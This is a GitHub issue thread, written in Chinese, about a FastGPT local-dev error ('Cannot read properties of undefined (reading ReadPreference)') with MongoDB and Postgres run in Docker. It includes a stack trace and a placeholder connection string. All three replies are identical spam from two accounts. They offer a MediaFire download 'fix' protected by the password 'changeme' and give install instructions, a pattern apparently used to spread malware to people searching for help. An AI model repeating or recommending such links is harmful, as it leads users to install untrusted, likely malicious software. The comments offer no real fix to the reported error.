### ISSUE TITLE
FastGPT 本地编译，对话时报错。mongo和pg使用docker启动

### ISSUE THREAD

**Issue by Tovi163** [labring/FastGPT#2557]
**例行检查**

[//]: # '方框内填 x 表示打钩'

- [x] 我已确认目前没有类似 issue
- [x] 我已完整查看过项目 README，以及[项目文档](https://doc.fastgpt.in/docs/intro/)
- [x] 我使用了自己的 key，并确认我的 key 是可正常使用的
- [x] 我理解并愿意跟进此 issue，协助测试和提供反馈
- [x] 我理解并认可上述内容，并理解项目维护者精力有限，**不遵循规则的 issue 可能会被无视或直接关闭**

**你的版本**

- [ ] 公有云版本
- [ ] 私有部署版本, 具体版本号: 4.8.9

**问题描述, 日志截图**
.env.local 中mongo配置

pnmp dev调试时，遇到报错

Cannot read properties of undefined (reading 'ReadPreference')
TypeError: Cannot read properties of undefined (reading 'ReadPreference') at eval (webpack-internal:///../../packages/service/common/mongo/index.ts:77:46) at ../../packages/service/common/mongo/index.ts (http://10.11.114.29/_next/static/chunks/src_components_core_chat_ChatContainer_ChatBox_index_tsx.js:711:1) at options.factory (http://10.11.114.29/_next/static/chunks/webpack.js:721:31) at __webpack_require__ (http://10.11.114.29/_next/static/chunks/webpack.js:37:33) at fn (http://10.11.114.29/_next/static/chunks/webpack.js:377:21) at eval (webpack-internal:///../../packages/service/common/system/log.ts:9:70) at ../../packages/service/common/system/log.ts (http://10.11.114.29/_next/static/chunks/src_components_core_chat_ChatContainer_ChatBox_index_tsx.js:722:1) at options.factory (http://10.11.114.29/_next/static/chunks/webpack.js:721:31) at __webpack_require__ (http://10.11.114.29/_next/static/chunks/webpack.js:37:33) at fn (http://10.11.114.29/_next/static/chunks/webpack.js:377:21) at eval (webpack-internal:///./src/components/core/chat/ChatContainer/ChatBox/Input/ChatInput.tsx:32:93) at ./src/components/core/chat/ChatContainer/ChatBox/Input/ChatInput.tsx (http://10.11.114.29/_next/static/chunks/src_components_core_chat_ChatContainer_ChatBox_index_tsx.js:821:1) at options.factory (http://10.11.114.29/_next/static/chunks/webpack.js:721:31) at __webpack_require__ (http://10.11.114.29/_next/static/chunks/webpack.js:37:33) at fn (http://10.11.114.29/_next/static/chunks/webpack.js:377:21) at eval (webpack-internal:///./src/components/core/chat/ChatContainer/ChatBox/index.tsx:21:75) at ./src/components/core/chat/ChatContainer/ChatBox/index.tsx (http://10.11.114.29/_next/static/chunks/src_components_core_chat_ChatContainer_ChatBox_index_tsx.js:898:1) at options.factory (http://10.11.114.29/_next/static/chunks/webpack.js:721:31) at __webpack_require__ (http://10.11.114.29/_next/static/chunks/webpack.js:37:33) at Function.fn (http://10.11.114.29/_next/static/chunks/webpack.js:377:21)

MONGODB_URI=mongodb://myusername:mypassword@10.227.94.27:27017/fastgpt?authSource=admin&directConnection=true

<img width="1583" alt="image" src="https://github.com/user-attachments/assets/40d406a5-bdbc-4967-9d8e-ef3376f722a7">

**复现步骤**

**预期结果**

**相关截图**

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
